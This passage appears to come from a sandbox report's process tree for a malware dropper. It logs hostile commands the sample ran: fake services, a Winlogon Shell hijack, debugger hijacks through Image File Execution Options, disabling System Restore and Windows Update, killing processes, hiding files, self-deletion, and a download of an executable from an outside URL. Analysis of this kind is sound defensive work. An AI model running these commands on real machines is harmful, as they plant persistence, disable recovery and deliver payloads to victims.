                                                                        reg add "HKLM\SYSTEM\CurrentControlSet\services\intelrd" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\Windows\SoftwareDistribution\intl.exe" /f
                                                                        4⤵
                                                                        • Sets service image path in registry
                                                                        PID:5304
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        Reg Add "HKLM\SYSTEM\CurrentControlSet\services\intelrd\Parameters" /v "Application" /t REG_SZ /d "C:\Windows\SoftwareDistribution\intl.bat" /f
                                                                        4⤵
                                                                          PID:2244
                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                          ping 127.0.0.1 -n 3
                                                                          4⤵
                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                          • Runs ping.exe
                                                                          PID:2192
                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                          sc config intelrd DisplayName= "Intel Rapid Storage Technology"
                                                                          4⤵
                                                                          • Launches sc.exe
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:5808
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intelrd.exe" /f
                                                                          4⤵
                                                                            PID:5768
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intl.exe" /f
                                                                            4⤵
                                                                              PID:4856
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\renim.exe" /f
                                                                              4⤵
                                                                                PID:5720
                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                ping 127.0.0.1 -n 1
                                                                                4⤵
                                                                                • System Network Configuration Discovery: Internet Connection Discovery
                                                                                • Runs ping.exe
                                                                                PID:6272
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\intelrd.exe\PerfOptions" /v CpuPriorityClass /t REG_DWORD /d "1" /f
                                                                                4⤵
                                                                                • Event Triggered Execution: Image File Execution Options Injection
                                                                                PID:6356
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\renim.exe\PerfOptions" /v CpuPriorityClass /t REG_DWORD /d "1" /f
                                                                                4⤵
                                                                                • Event Triggered Execution: Image File Execution Options Injection
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:6372
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\renims.exe\PerfOptions" /v CpuPriorityClass /t REG_DWORD /d "1" /f
                                                                                4⤵
                                                                                • Event Triggered Execution: Image File Execution Options Injection
                                                                                PID:6428
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                sc config intelrd DisplayName= "Intel Rapid Storage Technology"
                                                                                4⤵
                                                                                • Launches sc.exe
                                                                                PID:6476
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +h +s C:\Windows\intel\renim.exe
                                                                                4⤵
                                                                                • Views/modifies file attributes
                                                                                PID:6556
                                                                              • C:\Windows\SysWOW64\attrib.exe
                                                                                attrib +h +s intl.bat
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Views/modifies file attributes
                                                                                PID:6608
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                sc.exe delete intelrp
                                                                                4⤵
                                                                                • Launches sc.exe
                                                                                • System Location Discovery: System Language Discovery
                                                                                PID:6656
                                                                              • C:\Windows\SysWOW64\sc.exe
                                                                                sc.exe start intelrd
                                                                                4⤵
                                                                                • Launches sc.exe
                                                                                PID:6740
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im intelrp.exe /T
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:6948
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im intelrp.exe
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Kills process with taskkill
                                                                                PID:7188
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im renimin.exe /T
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Kills process with taskkill
                                                                                PID:12328
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im renimin.exe
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Kills process with taskkill
                                                                                PID:12564
                                                                              • C:\Windows\SoftwareDistribution\sfxd.exe
                                                                                sfxd.exe /cn /mn C:\Windows\intel\
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                PID:13828
                                                                              • C:\Windows\SoftwareDistribution\sfxd.exe
                                                                                sfxd.exe /co /mo C:\Windows\shdd\
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                • Drops file in Windows directory
                                                                                PID:12944
                                                                              • C:\Windows\SoftwareDistribution\sfxd.exe
                                                                                sfxd.exe /co /mo C:\Windows\SoftwareDistribution\
                                                                                4⤵
                                                                                • Executes dropped EXE
                                                                                PID:12968
                                                                          • C:\Users\Admin\Desktop\a\procx64.exe
                                                                            "C:\Users\Admin\Desktop\a\procx64.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            PID:3552
                                                                            • C:\Users\Admin\Desktop\a\x64\pomadachashin.exe
                                                                              "C:\Users\Admin\Desktop\a\x64\pomadachashin.exe"
                                                                              3⤵
                                                                              • Executes dropped EXE
                                                                              • Checks processor information in registry
                                                                              • Modifies system certificate store
                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                              • Suspicious use of FindShellTrayWindow
                                                                              • Suspicious use of SendNotifyMessage
                                                                              PID:4196
                                                                          • C:\Users\Admin\Desktop\a\ASUFER.exe
                                                                            "C:\Users\Admin\Desktop\a\ASUFER.exe"
                                                                            2⤵
                                                                            • Executes dropped EXE
                                                                            • Drops file in Windows directory
                                                                            PID:3324
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              C:\Windows\system32\cmd.exe /c ""C:\windows\ehome\SER.bat" "
                                                                              3⤵
                                                                              • Drops file in System32 directory
                                                                              • Drops file in Windows directory
                                                                              PID:2196
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im ipz.exe
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:3316
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im ipz2.exe
                                                                                4⤵
                                                                                • System Location Discovery: System Language Discovery
                                                                                • Kills process with taskkill
                                                                                PID:912
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im nvidsrv.exe
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:1464
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im safesurf.exe /T
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:1820
                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                taskkill /f /im surfguard.exe
                                                                                4⤵
                                                                                • Kills process with taskkill
                                                                                PID:2920
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU" /v "UseWUServer" /t REG_DWORD /d "0" /f
                                                                                4⤵
                                                                                  PID:388
                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                  reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmisrv.exe" /f
                                                                                  4⤵
                                                                                    PID:452
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmsdll.exe" /f
                                                                                    4⤵
                                                                                      PID:2872
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\amsql.exe" /f
                                                                                      4⤵
                                                                                        PID:2132
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\slscv.exe" /f
                                                                                        4⤵
                                                                                          PID:4756
                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                          reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\fturl.exe" /f
                                                                                          4⤵
                                                                                            PID:1436
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wdgmgr.exe" /f
                                                                                            4⤵
                                                                                              PID:4440
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              reg delete "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ams.exe" /f
                                                                                              4⤵
                                                                                                PID:1688
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Ratings /f
                                                                                                4⤵
                                                                                                • Modifies registry key
                                                                                                PID:1832
                                                                                              • C:\Windows\SysWOW64\subin.exe
                                                                                                subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\xStarter /deny=SYSTEM=F
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:3588
                                                                                              • C:\Windows\SysWOW64\subin.exe
                                                                                                subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ProgramService /deny=SYSTEM=F
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2652
                                                                                              • C:\Windows\SysWOW64\subin.exe
                                                                                                subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ddns /deny=SYSTEM=F
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:2016
                                                                                              • C:\windows\ehome\sc.exe
                                                                                                sc stop xStarter
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • Launches sc.exe
                                                                                                PID:4452
                                                                                              • C:\Windows\SysWOW64\subin.exe
                                                                                                subin /subkeyreg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Bios /deny=SYSTEM=F
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                PID:772
                                                                                              • C:\windows\ehome\wmild.exe
                                                                                                wmild.exe -c http://openslowmo.com/img/icons/SURFSET.exe --no-check-certificate
                                                                                                4⤵
                                                                                                • Executes dropped EXE
                                                                                                • Drops file in Windows directory
                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                PID:4636
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg delete HKLM\SOFTWARE\JetSwap /f
                                                                                                4⤵
                                                                                                • Modifies registry key
                                                                                                PID:8728
                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                reg delete HKCU\SOFTWARE\JetSwap /f
                                                                                                4⤵
                                                                                                • Modifies registry key
                                                                                                PID:8924
                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                net stop xStarter
                                                                                                4⤵
                                                                                                  PID:9932
                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                    C:\Windows\system32\net1 stop xStarter
                                                                                                    5⤵
                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                    PID:5724
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Wasppacer.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
                                                                                                  4⤵
                                                                                                  • Event Triggered Execution: Image File Execution Options Injection
                                                                                                  PID:9944
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\waagent.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
                                                                                                  4⤵
                                                                                                  • Event Triggered Execution: Image File Execution Options Injection
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:10208
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  Reg Add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wasub.exe" /v "debugger" /t REG_SZ /d "ctfmon.exe" /f
                                                                                                  4⤵
                                                                                                  • Event Triggered Execution: Image File Execution Options Injection
                                                                                                  PID:8888
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore" /v DisableSR /t REG_DWORD /d "1" /f
                                                                                                  4⤵
                                                                                                    PID:8900
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sr" /v Start /t REG_DWORD /d "4" /f
                                                                                                    4⤵
                                                                                                      PID:8936
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im wuau𫲮exe /T
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:8964
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im wuapp.exe /T
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:9060
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im waagent.exe /T
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:9168
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im wups.exe /T
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:9348
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im wudriver.exe /T
                                                                                                      4⤵
                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                      • Kills process with taskkill
                                                                                                      PID:9276
                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                      taskkill /f /im stub.exe
                                                                                                      4⤵
                                                                                                      • Kills process with taskkill
                                                                                                      PID:14248
                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                      net stop xStarter
                                                                                                      4⤵
                                                                                                        PID:9520
                                                                                                        • C:\Windows\SysWOW64\net1.exe
                                                                                                          C:\Windows\system32\net1 stop xStarter
                                                                                                          5⤵
                                                                                                            PID:9536
                                                                                                        • C:\windows\ehome\sc.exe
                                                                                                          sc stop xStarter
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Launches sc.exe
                                                                                                          PID:9568
                                                                                                    • C:\Users\Admin\Desktop\a\SecurityHealthService.exe
                                                                                                      "C:\Users\Admin\Desktop\a\SecurityHealthService.exe"
                                                                                                      2⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                      PID:2580
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "cmd" /c ping 127.0.0.1 -n 8 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "C:\Windows\explorer.exe, c:\windows\wininit.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                        PID:3956
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping 127.0.0.1 -n 8
                                                                                                          4⤵
                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                          • Runs ping.exe
                                                                                                          PID:2244
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "C:\Windows\explorer.exe, c:\windows\wininit.exe,C:\Users\Admin\Music\Windows Security Health Host.exe,"
                                                                                                          4⤵
                                                                                                          • Modifies WinLogon for persistence
                                                                                                          PID:8424
                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                        "cmd" /c ping 127.0.0.1 -n 11 > nul && copy "C:\Users\Admin\Desktop\a\SecurityHealthService.exe" "C:\Users\Admin\Music\Windows Security Health Host.exe" && ping 127.0.0.1 -n 11 > nul && "C:\Users\Admin\Music\Windows Security Health Host.exe"
                                                                                                        3⤵
                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                        PID:3528
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping 127.0.0.1 -n 11
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                          • Runs ping.exe
                                                                                                          PID:1564
                                                                                                        • C:\Windows\SysWOW64\PING.EXE
                                                                                                          ping 127.0.0.1 -n 11
                                                                                                          4⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                          • Runs ping.exe
                                                                                                          PID:12508
                                                                                                        • C:\Users\Admin\Music\Windows Security Health Host.exe
                                                                                                          "C:\Users\Admin\Music\Windows Security Health Host.exe"
                                                                                                          4⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:8980
                                                                                                          • C:\Users\Admin\Music\Windows Security Health Host.exe
                                                                                                            "C:\Users\Admin\Music\Windows Security Health Host.exe"
                                                                                                            5⤵
                                                                                                              PID:12864
                                                                                                      • C:\Users\Admin\Desktop\a\clr.exe
                                                                                                        "C:\Users\Admin\Desktop\a\clr.exe"
                                                                                                        2⤵
                                                                                                        • Executes dropped EXE
                                                                                                        • Drops file in Windows directory
                                                                                                        PID:3508
                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Windows\clrinst.bat" "
                                                                                                          3⤵
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4200
                                                                                                          • C:\Windows\SysWOW64\taskkill.exe
                                                                                                            taskkill /f /im miter.exe
                                                                                                            4⤵
                                                                                                            • Kills process with taskkill
                                                                                                            PID:2064
                                                                                                          • C:\Windows\instsrv.exe
                                                                                                            instsrv.exe alark C:\Windows\alark.exe
                                                                                                            4⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:3944
                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                            ping 127.0.0.1 -n 2
                                                                                                            4⤵
                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                            • Runs ping.exe
                                                                                                            PID:3992
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            Reg Add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "Description" /t REG_SZ /d "Alarm service for default browser." /f
                                                                                                            4⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2608
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            Reg Add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "DisplayName" /t REG_SZ /d "Alarm Key Service" /f
                                                                                                            4⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2044
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            Reg Add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "ObjectName" /t REG_SZ /d "LocalSystem" /f
                                                                                                            4⤵
                                                                                                              PID:3000
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              reg add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "Start" /t REG_DWORD /d "2" /f
                                                                                                              4⤵
                                                                                                                PID:2472
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                reg add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "Type" /t REG_DWORD /d "16" /f
                                                                                                                4⤵
                                                                                                                  PID:1068
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  reg add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "ErrorControl" /t REG_DWORD /d "1" /f
                                                                                                                  4⤵
                                                                                                                    PID:4704
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    reg add "HKLM\SYSTEM\CurrentControlSet\services\alark" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\Windows\alark.exe" /f
                                                                                                                    4⤵
                                                                                                                    • Sets service image path in registry
                                                                                                                    PID:3376
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    Reg Add "HKLM\SYSTEM\CurrentControlSet\services\alark\Parameters" /v "Application" /t REG_SZ /d "cmd /c start C:\Windows\miter.exe -t3010 C:\Windows\sysclr.bat" /f
                                                                                                                    4⤵
                                                                                                                      PID:2964
                                                                                                                    • C:\Windows\SysWOW64\PING.EXE
                                                                                                                      ping 127.0.0.1 -n 2
                                                                                                                      4⤵
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      • Runs ping.exe
                                                                                                                      PID:1764
                                                                                                                    • C:\Windows\SysWOW64\net.exe
                                                                                                                      net start alark
                                                                                                                      4⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:3500
                                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                                        C:\Windows\system32\net1 start alark
                                                                                                                        5⤵
                                                                                                                          PID:2748
                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                        ping 127.0.0.1 -n 4
                                                                                                                        4⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:4720
                                                                                                                      • C:\Windows\SysWOW64\timeout.exe
                                                                                                                        timeout 4 /NOBREAK
                                                                                                                        4⤵
                                                                                                                        • Delays execution with timeout.exe
                                                                                                                        PID:14236
                                                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                        taskkill /f /im alark.exe
                                                                                                                        4⤵
                                                                                                                        • Kills process with taskkill
                                                                                                                        PID:9420
                                                                                                                  • C:\Users\Admin\Desktop\a\Geek_se.exe
                                                                                                                    "C:\Users\Admin\Desktop\a\Geek_se.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:3976
                                                                                                                  • C:\Users\Admin\Desktop\a\GOLD.exe
                                                                                                                    "C:\Users\Admin\Desktop\a\GOLD.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:4104
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4104 -s 768
                                                                                                                      3⤵
                                                                                                                      • Program crash
                                                                                                                      PID:2616
                                                                                                                  • C:\Users\Admin\Desktop\a\OLDxTEAM.exe
                                                                                                                    "C:\Users\Admin\Desktop\a\OLDxTEAM.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:1540
                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1540 -s 768
                                                                                                                      3⤵
                                                                                                                      • Program crash
                                                                                                                      PID:4784
                                                                                                                  • C:\Users\Admin\Desktop\a\svchot%20-%20%E5%89%AF%E6%9C%AC.exe
                                                                                                                    "C:\Users\Admin\Desktop\a\svchot%20-%20%E5%89%AF%E6%9C%AC.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:6408
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\Desktop\a\SVCHOT~1.EXE > nul
                                                                                                                      3⤵
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      PID:13824
                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                        ping -n 2 127.0.0.1
                                                                                                                        4⤵
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:6224
                                                                                                                  • C:\Users\Admin\Desktop\a\svchot.exe
                                                                                                                    "C:\Users\Admin\Desktop\a\svchot.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:6952
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\Desktop\a\svchot.exe > nul
                                                                                                                      3⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                      PID:7160
                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                        ping -n 2 127.0.0.1
                                                                                                                        4⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                        • Runs ping.exe
                                                                                                                        PID:12864
                                                                                                                  • C:\Users\Admin\Desktop\a\svcyr.exe
                                                                                                                    "C:\Users\Admin\Desktop\a\svcyr.exe"
                                                                                                                    2⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:8476
                                                                                                                  • C:\Users\Admin\Desktop\a\RuntimeBroker.exe
                                                                                                                    "C:\Users\Admin\Desktop\a\RuntimeBroker.exe"
                                                                                                                    2⤵
                                                                                                                      PID:6348
                                                                                                                    • C:\Users\Admin\Desktop\a\AstraLoader.exe
                                                                                                                      "C:\Users\Admin\Desktop\a\AstraLoader.exe"
                                                                                                                      2⤵
                                                                                                                        PID:9508
                                                                                                                    • C:\Users\Admin\Desktop\New Text Document.exe
                                                                                                                      "C:\Users\Admin\Desktop\New Text Document.exe"
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:3424
                                                                                                                      • C:\Users\Admin\Desktop\a\shttpsr_mg.exe
                                                                                                                        "C:\Users\Admin\Desktop\a\shttpsr_mg.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:3988
                                                                                                                      • C:\Users\Admin\Desktop\a\svchot%20-%20%E5%89%AF%E6%9C%AC.exe
                                                                                                                        "C:\Users\Admin\Desktop\a\svchot%20-%20%E5%89%AF%E6%9C%AC.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        PID:6992
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\Desktop\a\SVCHOT~1.EXE > nul
                                                                                                                          3⤵
                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                          PID:1236
                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                            ping -n 2 127.0.0.1
                                                                                                                            4⤵
                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:12332
                                                                                                                      • C:\Users\Admin\Desktop\a\svchot.exe
                                                                                                                        "C:\Users\Admin\Desktop\a\svchot.exe"
                                                                                                                        2⤵
                                                                                                                        • Executes dropped EXE
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:13288
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          C:\Windows\system32\cmd.exe /c ping -n 2 127.0.0.1 > nul && del C:\Users\Admin\Desktop\a\svchot.exe > nul
                                                                                                                          3⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                          PID:7544
                                                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                                                            ping -n 2 127.0.0.1
                                                                                                                            4⤵
                                                                                                                            • System Network Configuration Discovery: Internet Connection Discovery
                                                                                                                            • Runs ping.exe
                                                                                                                            PID:7716
                                                                                                                      • C:\Users\Admin\Desktop\a\svcyr.exe
                                                                                                                        "C:\Users\Admin\Desktop\a\svcyr.exe"
                                                                                                                        2⤵
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        PID:8324
                                                                                                                    • C:\Windows\alark.exe
                                                                                                                      C:\Windows\alark.exe
                                                                                                                      1⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:2016
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c start C:\Windows\miter.exe -t3010 C:\Windows\sysclr.bat
                                                                                                                        2⤵
                                                                                                                          PID:3124
                                                                                                                          • C:\Windows\miter.exe
                                                                                                                            C:\Windows\miter.exe -t3010 C:\Windows\sysclr.bat
                                                                                                                            3⤵
                                                                                                                            • Executes dropped EXE
                                                                                                                            PID:4568
                                                                                                                      • C:\Windows\shdd\hddsvc.exe
                                                                                                                        C:\Windows\shdd\hddsvc.exe
                                                                                                                        1⤵
                                                                                                                        • Executes dropped EXE
